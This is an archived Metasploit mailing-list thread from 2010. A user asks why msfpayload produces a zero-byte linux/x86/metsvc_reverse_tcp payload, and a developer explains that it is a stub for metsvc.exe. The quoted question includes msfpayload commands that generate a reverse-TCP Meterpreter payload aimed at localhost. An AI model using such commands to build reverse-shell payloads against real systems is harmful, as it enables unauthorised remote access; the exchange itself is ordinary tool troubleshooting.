Metasploit mailing list archives
Re: linux/x86/metsvc_reverse_tcp results 0 bytes long
From: egypt () metasploit com
Date: Mon, 10 May 2010 03:22:16 -0600
metcsvc isn't a real payload, it's just a stub to connect to the metsvc exe which can be found in ./data/meterpreter/metsvc.exe . If you need to change the hardcoded port that it listens on, the source is in ./external/source/metsvc/src/ Hope this helped, egypt On Mon, May 10, 2010 at 2:05 AM, Konrads Smelkovs <konrads () smelkovs com> wrote:
konrads@konrads-laptop:~/msf2$ ./msfpayload linux/x86/metsvc_reverse_tcp LHOST=127.0.0.1 LPORT=8081 X >out.elf Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/metsvc_reverse_tcp Ā Length: 0 Options: LHOST=127.0.0.1,LPORT=8081 konrads@konrads-laptop:~/msf2$ ./msfpayload linux/x86/metsvc_reverse_tcp LHOST=127.0.0.1 LPORT=8081 P # linux/x86/metsvc_reverse_tcp - 0 bytes # http://www.metasploit.com # AutoRunScript=, LHOST=127.0.0.1, AppendExit=false, # AutoSystemInfo=true, PrependChrootBreak=false, # PrependSetresuid=false, InitialAutoRunScript=, # AutoLoadStdapi=true, PrependSetuid=false, LPORT=8081, # ReverseConnectRetries=5, PrependSetreuid=false my $buf = What am I doing wrong? -- Konrads Smelkovs Applied IT sorcery. _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- linux/x86/metsvc_reverse_tcp results 0 bytes long Konrads Smelkovs (May 10)
- Re: linux/x86/metsvc_reverse_tcp results 0 bytes long egypt (May 10)